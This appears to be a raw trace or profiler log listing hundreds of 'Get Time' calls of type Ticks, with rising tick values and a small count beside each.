| Get Time | type = Ticks, time = 187656 |
|
5 | |
| Get Time | type = Ticks, time = 187687 |
|
5 | |
| Get Time | type = Ticks, time = 187968 |
|
5 | |
| Get Time | type = Ticks, time = 187984 |
|
5 | |
| Get Time | type = Ticks, time = 188078 |
|
10 | |
| Get Time | type = Ticks, time = 188093 |
|
2 | |
| Get Time | type = Ticks, time = 188875 |
|
4 | |
| Get Time | type = Ticks, time = 188890 |
|
10 | |
| Get Time | type = Ticks, time = 188906 |
|
1 | |
| Get Time | type = Ticks, time = 189125 |
|
5 | |
| Get Time | type = Ticks, time = 189140 |
|
13 | |
| Get Time | type = Ticks, time = 189234 |
|
4 | |
| Get Time | type = Ticks, time = 189546 |
|
3 | |
| Get Time | type = Ticks, time = 189578 |
|
3 | |
| Get Time | type = Ticks, time = 189593 |
|
2 | |
| Get Time | type = Ticks, time = 190156 |
|
6 | |
| Get Time | type = Ticks, time = 190171 |
|
7 | |
| Get Time | type = Ticks, time = 190187 |
|
3 | |
| Get Time | type = Ticks, time = 190203 |
|
6 | |
| Get Time | type = Ticks, time = 190906 |
|
1 | |
| Get Time | type = Ticks, time = 190921 |
|
7 | |
| Get Time | type = Ticks, time = 190937 |
|
6 | |
| Get Time | type = Ticks, time = 190953 |
|
2 | |
| Get Time | type = Ticks, time = 191156 |
|
5 | |
| Get Time | type = Ticks, time = 191171 |
|
1 | |
| Get Time | type = Ticks, time = 191406 |
|
4 | |
| Get Time | type = Ticks, time = 191421 |
|
8 | |
| Get Time | type = Ticks, time = 191796 |
|
4 | |
| Get Time | type = Ticks, time = 191812 |
|
5 | |
| Get Time | type = Ticks, time = 191828 |
|
8 | |
| Get Time | type = Ticks, time = 192125 |
|
2 | |
| Get Time | type = Ticks, time = 192140 |
|
7 | |
| Get Time | type = Ticks, time = 192156 |
|
11 | |
| Get Time | type = Ticks, time = 192250 |
|
1 | |
| Get Time | type = Ticks, time = 192546 |
|
10 | |
| Get Time | type = Ticks, time = 192562 |
|
1 | |
| Get Time | type = Ticks, time = 192578 |
|
3 | |
| Get Time | type = Ticks, time = 192593 |
|
2 | |
| Get Time | type = Ticks, time = 192609 |
|
6 | |
| Get Time | type = Ticks, time = 193250 |
|
2 | |
| Get Time | type = Ticks, time = 193265 |
|
3 | |
| Get Time | type = Ticks, time = 193281 |
|
4 | |
| Get Time | type = Ticks, time = 193328 |
|
3 | |
| Get Time | type = Ticks, time = 193343 |
|
5 | |
| Get Time | type = Ticks, time = 193578 |
|
4 | |
| Get Time | type = Ticks, time = 193593 |
|
4 | |
| Get Time | type = Ticks, time = 193625 |
|
1 | |
| Get Time | type = Ticks, time = 195156 |
|
11 | |
| Get Time | type = Ticks, time = 195171 |
|
17 | |
| Get Time | type = Ticks, time = 195187 |
|
24 | |
| Get Time | type = Ticks, time = 195250 |
|
23 | |
| Get Time | type = Ticks, time = 195265 |
|
17 | |
| Get Time | type = Ticks, time = 195281 |
|
18 | |
| Get Time | type = Ticks, time = 195296 |
|
12 | |
| Get Time | type = Ticks, time = 195312 |
|
18 | |
| Get Time | type = Ticks, time = 195328 |
|
10 | |
| Get Time | type = Ticks, time = 195375 |
|
12 | |
| Get Time | type = Ticks, time = 195390 |
|
20 | |
| Get Time | type = Ticks, time = 195406 |
|
8 | |
| Get Time | type = Ticks, time = 195437 |
|
18 | |
| Get Time | type = Ticks, time = 195453 |
|
9 | |
| Get Time | type = Ticks, time = 195468 |
|
5 | |
| Get Time | type = Ticks, time = 195484 |
|
12 | |
| Get Time | type = Ticks, time = 195500 |
|
4 | |
| Get Time | type = Ticks, time = 197312 |
|
16 | |
| Get Time | type = Ticks, time = 197328 |
|
16 | |
| Get Time | type = Ticks, time = 197390 |
|
10 | |
| Get Time | type = Ticks, time = 197406 |
|
16 | |
| Get Time | type = Ticks, time = 197421 |
|
8 | |
| Get Time | type = Ticks, time = 197640 |
|
2 | |
| Get Time | type = Ticks, time = 197656 |
|
8 | |
| Get Time | type = Ticks, time = 198187 |
|
12 | |
| Get Time | type = Ticks, time = 198203 |
|
18 | |
| Get Time | type = Ticks, time = 198218 |
|
9 | |
| Get Time | type = Ticks, time = 198515 |
|
7 | |
| Get Time | type = Ticks, time = 198531 |
|
10 | |
| Get Time | type = Ticks, time = 198546 |
|
6 | |
| Get Time | type = Ticks, time = 198656 |
|
22 | |
| Get Time | type = Ticks, time = 198921 |
|
8 | |
| Get Time | type = Ticks, time = 198937 |
|
17 | |
| Get Time | type = Ticks, time = 198953 |
|
9 | |
| Get Time | type = Ticks, time = 199031 |
|
2 | |
| Get Time | type = Ticks, time = 199046 |
|
1 | |
| Get Time | type = Ticks, time = 199062 |
|
1 | |
| Get Time | type = Ticks, time = 199078 |
|
1 | |
| Get Time | type = Ticks, time = 199093 |
|
1 | |
| Get Time | type = Ticks, time = 199109 |
|
10 | |
| Get Time | type = Ticks, time = 199125 |
|
7 | |
| Get Time | type = Ticks, time = 199140 |
|
3 | |
| Get Time | type = Ticks, time = 199281 |
|
12 | |
| Get Time | type = Ticks, time = 199296 |
|
18 | |
| Get Time | type = Ticks, time = 199312 |
|
14 | |
| Get Time | type = Ticks, time = 199406 |
|
4 | |
| Get Time | type = Ticks, time = 199734 |
|
2 | |
| Get Time | type = Ticks, time = 199750 |
|
15 | |
| Get Time | type = Ticks, time = 199765 |
|
17 | |
| Get Time | type = Ticks, time = 199781 |
|
20 | |
| Get Time | type = Ticks, time = 199875 |
|
10 | |
| Get Time | type = Ticks, time = 199890 |
|
12 | |
| Get Time | type = Ticks, time = 199906 |
|
16 | |
| Get Time | type = Ticks, time = 199953 |
|
2 | |
| Get Time | type = Ticks, time = 200109 |
|
4 | |
| Get Time | type = Ticks, time = 200125 |
|
20 | |
| Get Time | type = Ticks, time = 200140 |
|
12 | |
| Get Time | type = Ticks, time = 200187 |
|
10 | |
| Get Time | type = Ticks, time = 200203 |
|
24 | |
| Get Time | type = Ticks, time = 200281 |
|
10 | |
| Get Time | type = Ticks, time = 200343 |
|
10 | |
| Get Time | type = Ticks, time = 200359 |
|
12 | |
| Get Time | type = Ticks, time = 200375 |
|
14 | |
| Get Time | type = Ticks, time = 201000 |
|
14 | |
| Get Time | type = Ticks, time = 201015 |
|
14 | |
| Get Time | type = Ticks, time = 201031 |
|
16 | |
| Get Time | type = Ticks, time = 201375 |
|
2 | |
| Get Time | type = Ticks, time = 201390 |
|
8 | |
| Get Time | type = Ticks, time = 201406 |
|
3 | |
| Get Time | type = Ticks, time = 201421 |
|
17 | |
| Get Time | type = Ticks, time = 201500 |
|
8 | |
| Get Time | type = Ticks, time = 201515 |
|
12 | |
| Get Time | type = Ticks, time = 201531 |
|
8 | |
| Get Time | type = Ticks, time = 201546 |
|
17 | |
| Get Time | type = Ticks, time = 201656 |
|
1 | |
| Get Time | type = Ticks, time = 202031 |
|
8 | |
| Get Time | type = Ticks, time = 202062 |
|
8 | |
| Get Time | type = Ticks, time = 202078 |
|
12 | |
| Get Time | type = Ticks, time = 202140 |
|
4 | |
| Get Time | type = Ticks, time = 202156 |
|
4 | |
| Get Time | type = Ticks, time = 202734 |
|
8 | |
| Get Time | type = Ticks, time = 202750 |
|
15 | |
| Get Time | type = Ticks, time = 202765 |
|
9 | |
| Get Time | type = Ticks, time = 202796 |
|
1 | |
| Get Time | type = Ticks, time = 203296 |
|
1 | |
| Get Time | type = Ticks, time = 203375 |
|
4 | |
| Get Time | type = Ticks, time = 203390 |
|
1 | |
| Get Time | type = Ticks, time = 203421 |
|
1 | |
| Get Time | type = Ticks, time = 203468 |
|
4 | |
| Get Time | type = Ticks, time = 203484 |
|
12 | |
| Get Time | type = Ticks, time = 203765 |
|
2 | |
| Get Time | type = Ticks, time = 203781 |
|
13 | |
| Get Time | type = Ticks, time = 203796 |
|
5 | |
| Get Time | type = Ticks, time = 203812 |
|
6 | |
| Get Time | type = Ticks, time = 204765 |
|
8 | |
| Get Time | type = Ticks, time = 204781 |
|
14 | |
| Get Time | type = Ticks, time = 204796 |
|
10 | |
| Get Time | type = Ticks, time = 204968 |
|
5 | |
| Get Time | type = Ticks, time = 204984 |
|
5 | |
| Get Time | type = Ticks, time = 205031 |
|
4 | |
| Get Time | type = Ticks, time = 205046 |
|
8 | |
| Get Time | type = Ticks, time = 205296 |
|
4 | |
| Get Time | type = Ticks, time = 205312 |
|
6 | |
| Get Time | type = Ticks, time = 206031 |
|
4 | |
| Get Time | type = Ticks, time = 206046 |
|
12 | |
| Get Time | type = Ticks, time = 206062 |
|
8 | |
| Get Time | type = Ticks, time = 206109 |
|
2 | |
| Get Time | type = Ticks, time = 206328 |
|
2 | |
| Get Time | type = Ticks, time = 207078 |
|
4 | |
| Get Time | type = Ticks, time = 207093 |
|
14 | |
| Get Time | type = Ticks, time = 207109 |
|
19 | |
| Get Time | type = Ticks, time = 207203 |
|
1 | |
| Get Time | type = Ticks, time = 207296 |
|
6 | |
| Get Time | type = Ticks, time = 207312 |
|
12 | |
| Get Time | type = Ticks, time = 207328 |
|
10 | |
| Get Time | type = Ticks, time = 207343 |
|
16 | |
| Get Time | type = Ticks, time = 207703 |
|
2 | |
| Get Time | type = Ticks, time = 207718 |
|
14 | |
| Get Time | type = Ticks, time = 207734 |
|
4 | |
| Get Time | type = Ticks, time = 207750 |
|
8 | |
| Get Time | type = Ticks, time = 208000 |
|
7 | |
| Get Time | type = Ticks, time = 208015 |
|
5 | |
| Get Time | type = Ticks, time = 208031 |
|
12 | |
| Get Time | type = Ticks, time = 208046 |
|
6 | |
| Get Time | type = Ticks, time = 208171 |
|
6 | |
| Get Time | type = Ticks, time = 208203 |
|
2 | |
| Get Time | type = Ticks, time = 208734 |
|
6 | |
| Get Time | type = Ticks, time = 208750 |
|
10 | |
| Get Time | type = Ticks, time = 208765 |
|
12 | |
| Get Time | type = Ticks, time = 209171 |
|
2 | |
| Get Time | type = Ticks, time = 209187 |
|
6 | |
| Get Time | type = Ticks, time = 209843 |
|
2 | |
| Get Time | type = Ticks, time = 209859 |
|
14 | |
| Get Time | type = Ticks, time = 213578 |
|
8 | |
| Get Time | type = Ticks, time = 215312 |
|
10 | |
| Get Time | type = Ticks, time = 215328 |
|
14 | |
| Get Time | type = Ticks, time = 215390 |
|
4 | |
| Get Time | type = Ticks, time = 215609 |
|
14 | |
| Get Time | type = Ticks, time = 215625 |
|
16 | |
| Get Time | type = Ticks, time = 215640 |
|
12 | |
| Get Time | type = Ticks, time = 217125 |
|
11 | |
| Get Time | type = Ticks, time = 217140 |
|
13 | |
| Get Time | type = Ticks, time = 217156 |
|
6 | |
| Get Time | type = Ticks, time = 217406 |
|
4 | |
| Get Time | type = Ticks, time = 217421 |
|
2 | |
| Get Time | type = Ticks, time = 217687 |
|
2 | |
| Get Time | type = Ticks, time = 217703 |
|
16 | |
| Get Time | type = Ticks, time = 217718 |
|
18 | |
| Get Time | type = Ticks, time = 217734 |
|
10 | |
| Get Time | type = Ticks, time = 218406 |
|
10 | |
| Get Time | type = Ticks, time = 218421 |
|
14 | |
| Get Time | type = Ticks, time = 218437 |
|
14 | |
| Get Time | type = Ticks, time = 218921 |
|
4 | |
| Get Time | type = Ticks, time = 218937 |
|
6 | |
| Get Time | type = Ticks, time = 219203 |
|
4 | |
| Get Time | type = Ticks, time = 219218 |
|
8 | |
| Get Time | type = Ticks, time = 219234 |
|
2 | |
| Get Time | type = Ticks, time = 219250 |
|
10 | |
| Get Time | type = Ticks, time = 219265 |
|
16 | |
| Get Time | type = Ticks, time = 219390 |
|
5 | |
| Get Time | type = Ticks, time = 219406 |
|
12 | |
| Get Time | type = Ticks, time = 219421 |
|
11 | |
| Get Time | type = Ticks, time = 220062 |
|
4 | |
| Get Time | type = Ticks, time = 220078 |
|
8 | |
| Get Time | type = Ticks, time = 220171 |
|
2 | |
| Get Time | type = Ticks, time = 220187 |
|
8 | |
| Get Time | type = Ticks, time = 220468 |
|
10 | |
| Get Time | type = Ticks, time = 220484 |
|
9 | |
| Get Time | type = Ticks, time = 220546 |
|
7 | |
| Get Time | type = Ticks, time = 221406 |
|
3 | |
| Get Time | type = Ticks, time = 221453 |
|
7 | |
| Get Time | type = Ticks, time = 221468 |
|
12 | |
| Get Time | type = Ticks, time = 221484 |
|
14 | |
| Get Time | type = Ticks, time = 221906 |
|
8 | |
| Get Time | type = Ticks, time = 221953 |
|
4 | |
| Get Time | type = Ticks, time = 222296 |
|
6 | |
| Get Time | type = Ticks, time = 222312 |
|
9 | |
| Get Time | type = Ticks, time = 222328 |
|
1 | |
| Get Time | type = Ticks, time = 222812 |
|
2 | |
| Get Time | type = Ticks, time = 223484 |
|
4 | |
| Get Time | type = Ticks, time = 223500 |
|
4 | |
| Get Time | type = Ticks, time = 223515 |
|
1 | |
| Get Time | type = Ticks, time = 223531 |
|
7 | |
| Get Time | type = Ticks, time = 223562 |
|
14 | |
| Get Time | type = Ticks, time = 223859 |
|
12 | |
| Get Time | type = Ticks, time = 223875 |
|
18 | |
| Get Time | type = Ticks, time = 223890 |
|
2 | |
| Get Time | type = Ticks, time = 224546 |
|
2 | |
| Get Time | type = Ticks, time = 224562 |
|
12 | |
| Get Time | type = Ticks, time = 224578 |
|
14 | |
| Get Time | type = Ticks, time = 225015 |
|
6 | |
| Get Time | type = Ticks, time = 225031 |
|
10 | |
| Get Time | type = Ticks, time = 225046 |
|
6 | |
| Get Time | type = Ticks, time = 227250 |
|
9 | |
| Get Time | type = Ticks, time = 227265 |
|
15 | |
| Get Time | type = Ticks, time = 227281 |
|
16 | |
| Get Time | type = Ticks, time = 227296 |
|
12 | |
| Get Time | type = Ticks, time = 227312 |
|
18 | |
| Get Time | type = Ticks, time = 227328 |
|
18 | |
| Get Time | type = Ticks, time = 227500 |
|
10 | |
| Get Time | type = Ticks, time = 227515 |
|
12 | |
| Get Time | type = Ticks, time = 227531 |
|
4 | |
| Get Time | type = Ticks, time = 228500 |
|
2 | |
| Get Time | type = Ticks, time = 228515 |
|
12 | |
| Get Time | type = Ticks, time = 228531 |
|
14 | |
| Get Time | type = Ticks, time = 228750 |
|
8 | |
| Get Time | type = Ticks, time = 228765 |
|
12 | |
| Get Time | type = Ticks, time = 228781 |
|
2 | |
| Get Time | type = Ticks, time = 229109 |
|
2 | |
| Get Time | type = Ticks, time = 229125 |
|
14 | |
| Get Time | type = Ticks, time = 229140 |
|
10 | |
| Get Time | type = Ticks, time = 229890 |
|
5 | |
| Get Time | type = Ticks, time = 229906 |
|
11 | |
| Get Time | type = Ticks, time = 229921 |
|
18 | |
| Get Time | type = Ticks, time = 230109 |
|
7 | |
| Get Time | type = Ticks, time = 230125 |
|
9 | |
| Get Time | type = Ticks, time = 230140 |
|
12 | |
| Get Time | type = Ticks, time = 230265 |
|
14 | |
| Get Time | type = Ticks, time = 230281 |
|
2 | |
| Get Time | type = Ticks, time = 230921 |
|
4 | |
| Get Time | type = Ticks, time = 230937 |
|
12 | |
| Get Time | type = Ticks, time = 230968 |
|
12 | |
| Get Time | type = Ticks, time = 231218 |
|
4 | |
| Get Time | type = Ticks, time = 231234 |
|
12 | |
| Get Time | type = Ticks, time = 231250 |
|
14 | |
| Get Time | type = Ticks, time = 231265 |
|
4 | |
| Get Time | type = Ticks, time = 231656 |
|
2 | |
| Get Time | type = Ticks, time = 231671 |
|
8 | |
| Get Time | type = Ticks, time = 231687 |
|
6 | |
| Get Time | type = Ticks, time = 232375 |
|
8 | |
| Get Time | type = Ticks, time = 232390 |
|
12 | |
| Get Time | type = Ticks, time = 232406 |
|
10 | |
| Get Time | type = Ticks, time = 233203 |
|
4 | |
| Get Time | type = Ticks, time = 233218 |
|
2 | |
| Get Time | type = Ticks, time = 233234 |
|
2 | |
| Get Time | type = Ticks, time = 233250 |
|
6 | |
| Get Time | type = Ticks, time = 233265 |
|
4 | |
| Get Time | type = Ticks, time = 233296 |
|
2 | |
| Get Time | type = Ticks, time = 233312 |
|
4 | |
| Get Time | type = Ticks, time = 233375 |
|
4 | |
| Get Time | type = Ticks, time = 233390 |
|
2 | |
| Get Time | type = Ticks, time = 233437 |
|
2 | |
| Get Time | type = Ticks, time = 233468 |
|
2 | |
| Get Time | type = Ticks, time = 233484 |
|
2 | |
| Get Time | type = Ticks, time = 233500 |
|
2 | |
| Get Time | type = Ticks, time = 233531 |
|
2 | |
| Get Time | type = Ticks, time = 233546 |
|
2 | |
| Get Time | type = Ticks, time = 233562 |
|
2 | |
| Get Time | type = Ticks, time = 233578 |
|
4 | |
| Get Time | type = Ticks, time = 233593 |
|
2 | |
| Get Time | type = Ticks, time = 233609 |
|
13 | |
| Get Time | type = Ticks, time = 233625 |
|
3 | |
| Get Time | type = Ticks, time = 234640 |
|
4 | |
| Get Time | type = Ticks, time = 234656 |
|
4 | |
| Get Time | type = Ticks, time = 234671 |
|
6 | |
| Get Time | type = Ticks, time = 235000 |
|
4 | |
| Get Time | type = Ticks, time = 235015 |
|
4 | |
| Get Time | type = Ticks, time = 235953 |
|
2 | |
| Get Time | type = Ticks, time = 235968 |
|
4 | |
| Get Time | type = Ticks, time = 235984 |
|
4 | |
| Get Time | type = Ticks, time = 236015 |
|
8 | |
| Get Time | type = Ticks, time = 236031 |
|
4 | |
| Get Time | type = Ticks, time = 236062 |
|
6 | |
| Get Time | type = Ticks, time = 236078 |
|
4 | |
| Get Time | type = Ticks, time = 236093 |
|
2 | |
| Get Time | type = Ticks, time = 236421 |
|
10 | |
| Get Time | type = Ticks, time = 236437 |
|
18 | |
| Get Time | type = Ticks, time = 236453 |
|
10 | |
| Get Time | type = Ticks, time = 236843 |
|
4 | |
| Get Time | type = Ticks, time = 236875 |
|
10 | |
| Get Time | type = Ticks, time = 236890 |
|
16 | |
| Get Time | type = Ticks, time = 237640 |
|
12 | |
| Get Time | type = Ticks, time = 237656 |
|
14 | |
| Get Time | type = Ticks, time = 237812 |
|
4 | |
| Get Time | type = Ticks, time = 237828 |
|
9 | |
| Get Time | type = Ticks, time = 237843 |
|
15 | |
| Get Time | type = Ticks, time = 237859 |
|
22 | |
| Get Time | type = Ticks, time = 238328 |
|
2 | |
| Get Time | type = Ticks, time = 238359 |
|
2 | |
| Get Time | type = Ticks, time = 238390 |
|
4 | |
| Get Time | type = Ticks, time = 238406 |
|
12 | |
| Get Time | type = Ticks, time = 238421 |
|
16 | |
| Get Time | type = Ticks, time = 238765 |
|
8 | |
| Get Time | type = Ticks, time = 239234 |
|
4 | |
| Get Time | type = Ticks, time = 239250 |
|
10 | |
| Get Time | type = Ticks, time = 239265 |
|
10 | |
| Get Time | type = Ticks, time = 239281 |
|
16 | |
| Get Time | type = Ticks, time = 239468 |
|
2 | |
| Get Time | type = Ticks, time = 239484 |
|
4 | |
| Get Time | type = Ticks, time = 239531 |
|
6 | |
| Get Time | type = Ticks, time = 239937 |
|
10 | |
| Get Time | type = Ticks, time = 240171 |
|
2 | |
| Get Time | type = Ticks, time = 240187 |
|
10 | |
| Get Time | type = Ticks, time = 240453 |
|
2 | |
| Get Time | type = Ticks, time = 240953 |
|
2 | |
| Get Time | type = Ticks, time = 241187 |
|
8 | |
| Get Time | type = Ticks, time = 241203 |
|
8 | |
| Get Time | type = Ticks, time = 241218 |
|
18 | |
| Get Time | type = Ticks, time = 241234 |
|
16 | |
| Get Time | type = Ticks, time = 241640 |
|
6 | |
| Get Time | type = Ticks, time = 241671 |
|
32 | |
| Get Time | type = Ticks, time = 242109 |
|
4 | |
| Get Time | type = Ticks, time = 242125 |
|
18 | |
| Get Time | type = Ticks, time = 242140 |
|
14 | |
| Get Time | type = Ticks, time = 242156 |
|
10 | |
| Get Time | type = Ticks, time = 242171 |
|
18 | |
| Get Time | type = Ticks, time = 242859 |
|
2 | |
| Get Time | type = Ticks, time = 242875 |
|
4 | |
| Get Time | type = Ticks, time = 243359 |
|
2 | |
| Get Time | type = Ticks, time = 243625 |
|
12 | |
| Get Time | type = Ticks, time = 243921 |
|
22 | |
| Get Time | type = Ticks, time = 243937 |
|
24 | |
| Get Time | type = Ticks, time = 243953 |
|
24 | |
| Get Time | type = Ticks, time = 244218 |
|
8 | |
| Get Time | type = Ticks, time = 244234 |
|
14 | |
| Get Time | type = Ticks, time = 244250 |
|
4 | |
| Get Time | type = Ticks, time = 244281 |
|
14 | |
| Get Time | type = Ticks, time = 244296 |
|
16 | |
| Get Time | type = Ticks, time = 244578 |
|
12 | |
| Get Time | type = Ticks, time = 244593 |
|
20 | |
| Get Time | type = Ticks, time = 246328 |
|
10 | |
| Get Time | type = Ticks, time = 246343 |
|
18 | |
| Get Time | type = Ticks, time = 246359 |
|
26 | |
| Get Time | type = Ticks, time = 246484 |
|
12 | |
| Get Time | type = Ticks, time = 246546 |
|
10 | |
| Get Time | type = Ticks, time = 246562 |
|
20 | |
| Get Time | type = Ticks, time = 246578 |
|
16 | |
| Get Time | type = Ticks, time = 246656 |
|
8 | |
| Get Time | type = Ticks, time = 246671 |
|
20 | |
| Get Time | type = Ticks, time = 246687 |
|
16 | |
| Get Time | type = Ticks, time = 246765 |
|
2 | |
| Get Time | type = Ticks, time = 246781 |
|
10 | |
| Get Time | type = Ticks, time = 246796 |
|
4 | |
| Get Time | type = Ticks, time = 248187 |
|
18 | |
| Get Time | type = Ticks, time = 248203 |
|
26 | |
| Get Time | type = Ticks, time = 248218 |
|
2 | |
| Get Time | type = Ticks, time = 248296 |
|
4 | |
| Get Time | type = Ticks, time = 248515 |
|
2 | |
| Get Time | type = Ticks, time = 248531 |
|
2 | |
| Get Time | type = Ticks, time = 248562 |
|
10 | |
| Get Time | type = Ticks, time = 248578 |
|
26 | |
| Get Time | type = Ticks, time = 248593 |
|
16 | |
| Get Time | type = Ticks, time = 248750 |
|
10 | |
| Get Time | type = Ticks, time = 248796 |
|
4 | |
| Get Time | type = Ticks, time = 248812 |
|
6 | |
| Get Time | type = Ticks, time = 249390 |
|
14 | |
| Get Time | type = Ticks, time = 249484 |
|
2 | |
| Get Time | type = Ticks, time = 249500 |
|
22 | |
| Get Time | type = Ticks, time = 249531 |
|
6 | |
| Get Time | type = Ticks, time = 249546 |
|
20 | |
| Get Time | type = Ticks, time = 250078 |
|
6 | |
| Get Time | type = Ticks, time = 250843 |
|
4 | |
| Get Time | type = Ticks, time = 250859 |
|
4 | |
| Get Time | type = Ticks, time = 251093 |
|
4 | |
| Get Time | type = Ticks, time = 251109 |
|
5 | |
| Get Time | type = Ticks, time = 251125 |
|
7 | |
| Get Time | type = Ticks, time = 251296 |
|
4 | |
| Get Time | type = Ticks, time = 251312 |
|
2 | |
| Get Time | type = Ticks, time = 251390 |
|
6 | |
| Get Time | type = Ticks, time = 251781 |
|
20 | |
| Get Time | type = Ticks, time = 252531 |
|
4 | |
| Get Time | type = Ticks, time = 254093 |
|
6 | |
| Get Time | type = Ticks, time = 254828 |
|
8 | |
| Get Time | type = Ticks, time = 255234 |
|
2 | |
| Get Time | type = Ticks, time = 255250 |
|
16 | |
| Get Time | type = Ticks, time = 256015 |
|
8 | |
| Get Time | type = Ticks, time = 256031 |
|
34 | |
| Get Time | type = Ticks, time = 256343 |
|
2 | |
| Get Time | type = Ticks, time = 256359 |
|
18 | |
| Get Time | type = Ticks, time = 256375 |
|
10 | |
| Get Time | type = Ticks, time = 256718 |
|
10 | |
| Get Time | type = Ticks, time = 256734 |
|
12 | |
| Get Time | type = Ticks, time = 257093 |
|
4 | |
| Get Time | type = Ticks, time = 257109 |
|
2 | |
| Get Time | type = Ticks, time = 257125 |
|
10 | |
| Get Time | type = Ticks, time = 257281 |
|
16 | |
| Get Time | type = Ticks, time = 257921 |
|
8 | |
| Get Time | type = Ticks, time = 258062 |
|
14 | |
| Get Time | type = Ticks, time = 258078 |
|
24 | |
| Get Time | type = Ticks, time = 258500 |
|
10 | |
| Get Time | type = Ticks, time = 258515 |
|
16 | |
| Get Time | type = Ticks, time = 258531 |
|
4 | |
| Get Time | type = Ticks, time = 259000 |
|
14 | |
| Get Time | type = Ticks, time = 259031 |
|
6 | |
| Get Time | type = Ticks, time = 259046 |
|
10 | |
| Get Time | type = Ticks, time = 259250 |
|
8 | |
| Get Time | type = Ticks, time = 259265 |
|
8 | |
| Get Time | type = Ticks, time = 261515 |
|
5 | |
| Get Time | type = Ticks, time = 261531 |
|
1 | |
| Get Time | type = Ticks, time = 261671 |
|
2 | |
| Get Time | type = Ticks, time = 261765 |
|
16 | |
| Get Time | type = Ticks, time = 261781 |
|
4 | |
| Get Time | type = Ticks, time = 261812 |
|
6 | |
| Get Time | type = Ticks, time = 261828 |
|
9 | |
| Get Time | type = Ticks, time = 261843 |
|
13 | |
| Get Time | type = Ticks, time = 261859 |
|
5 | |
| Get Time | type = Ticks, time = 262609 |
|
1 | |
| Get Time | type = Ticks, time = 263015 |
|
12 | |
| Get Time | type = Ticks, time = 263031 |
|
8 | |
| Get Time | type = Ticks, time = 263062 |
|
2 | |
| Get Time | type = Ticks, time = 263921 |
|
4 | |
| Get Time | type = Ticks, time = 263937 |
|
10 | |
| Get Time | type = Ticks, time = 264187 |
|
8 | |
| Get Time | type = Ticks, time = 264203 |
|
16 | |
| Get Time | type = Ticks, time = 264765 |
|
13 | |
| Get Time | type = Ticks, time = 264781 |
|
11 | |
| Get Time | type = Ticks, time = 264812 |
|
8 | |
| Get Time | type = Ticks, time = 265140 |
|
12 | |
| Get Time | type = Ticks, time = 265156 |
|
14 | |
| Get Time | type = Ticks, time = 265171 |
|
18 | |
| Get Time | type = Ticks, time = 265265 |
|
6 | |
| Get Time | type = Ticks, time = 265281 |
|
16 | |
| Get Time | type = Ticks, time = 265734 |
|
2 | |
| Get Time | type = Ticks, time = 266125 |
|
2 | |
| Get Time | type = Ticks, time = 266500 |
|
8 | |
| Get Time | type = Ticks, time = 266515 |
|
11 | |
| Get Time | type = Ticks, time = 266828 |
|
1 | |
| Get Time | type = Ticks, time = 267234 |
|
7 | |
| Get Time | type = Ticks, time = 267250 |
|
6 | |
| Get Time | type = Ticks, time = 267546 |
|
3 | |
| Get Time | type = Ticks, time = 267718 |
|
1 | |
| Get Time | type = Ticks, time = 267734 |
|
7 | |
| Get Time | type = Ticks, time = 268046 |
|
6 | |
| Get Time | type = Ticks, time = 268062 |
|
12 | |
| Get Time | type = Ticks, time = 268078 |
|
2 | |
| Get Time | type = Ticks, time = 268250 |
|
5 | |
| Get Time | type = Ticks, time = 268484 |
|
2 | |
| Get Time | type = Ticks, time = 268500 |
|
7 | |
| Get Time | type = Ticks, time = 268515 |
|
7 | |
| Get Time | type = Ticks, time = 268531 |
|
15 | |
| Get Time | type = Ticks, time = 268593 |
|
2 | |
| Get Time | type = Ticks, time = 268875 |
|
8 | |
| Get Time | type = Ticks, time = 268890 |
|
7 | |
| Get Time | type = Ticks, time = 272437 |
|
5 | |
| Get Time | type = Ticks, time = 272453 |
|
6 | |
| Get Time | type = Ticks, time = 272468 |
|
5 | |
| Get Time | type = Ticks, time = 272671 |
|
7 | |
| Get Time | type = Ticks, time = 272687 |
|
8 | |
| Get Time | type = Ticks, time = 272703 |
|
4 | |
| Get Time | type = Ticks, time = 272718 |
|
7 | |
| Get Time | type = Ticks, time = 272796 |
|
2 | |
| Get Time | type = Ticks, time = 272812 |
|
7 | |
| Get Time | type = Ticks, time = 272828 |
|
2 | |
| Get Time | type = Ticks, time = 273078 |
|
8 | |
| Get Time | type = Ticks, time = 273093 |
|
5 | |
| Get Time | type = Ticks, time = 273109 |
|
7 | |
| Get Time | type = Ticks, time = 274062 |
|
2 | |
| Get Time | type = Ticks, time = 274078 |
|
6 | |
| Get Time | type = Ticks, time = 274093 |
|
6 | |
| Get Time | type = Ticks, time = 274265 |
|
3 | |
| Get Time | type = Ticks, time = 274281 |
|
4 | |
| Get Time | type = Ticks, time = 274296 |
|
9 | |
| Get Time | type = Ticks, time = 274406 |
|
2 | |
| Get Time | type = Ticks, time = 274656 |
|
2 | |
| Get Time | type = Ticks, time = 274671 |
|
4 | |
| Get Time | type = Ticks, time = 274687 |
|
5 | |
| Get Time | type = Ticks, time = 274828 |
|
1 | |
| Get Time | type = Ticks, time = 274843 |
|
9 | |
| Get Time | type = Ticks, time = 274859 |
|
4 | |
| Get Time | type = Ticks, time = 275359 |
|
1 | |
| Get Time | type = Ticks, time = 275375 |
|
11 | |
| Get Time | type = Ticks, time = 275390 |
|
12 | |
| Get Time | type = Ticks, time = 275937 |
|
6 | |
| Get Time | type = Ticks, time = 275953 |
|
7 | |
| Get Time | type = Ticks, time = 275968 |
|
1 | |
| Get Time | type = Ticks, time = 276171 |
|
8 | |
| Get Time | type = Ticks, time = 276187 |
|
10 | |
| Get Time | type = Ticks, time = 276203 |
|
5 | |
| Get Time | type = Ticks, time = 276546 |
|
6 | |
| Get Time | type = Ticks, time = 276562 |
|
5 | |
| Get Time | type = Ticks, time = 276578 |
|
7 | |
| Get Time | type = Ticks, time = 276609 |
|
6 | |
| Get Time | type = Ticks, time = 276625 |
|
2 | |
| Get Time | type = Ticks, time = 276640 |
|
7 | |
| Get Time | type = Ticks, time = 276671 |
|
9 | |
| Get Time | type = Ticks, time = 276687 |
|
12 | |
| Get Time | type = Ticks, time = 276828 |
|
6 | |
| Get Time | type = Ticks, time = 276843 |
|
7 | |
| Get Time | type = Ticks, time = 276859 |
|
7 | |
| Get Time | type = Ticks, time = 277531 |
|
9 | |
| Get Time | type = Ticks, time = 277546 |
|
8 | |
| Get Time | type = Ticks, time = 277562 |
|
9 | |
| Get Time | type = Ticks, time = 277765 |
|
3 | |
| Get Time | type = Ticks, time = 277781 |
|
9 | |
| Get Time | type = Ticks, time = 277796 |
|
10 | |
| Get Time | type = Ticks, time = 277937 |
|
5 | |
| Get Time | type = Ticks, time = 277953 |
|
5 | |
| Get Time | type = Ticks, time = 278015 |
|
2 | |
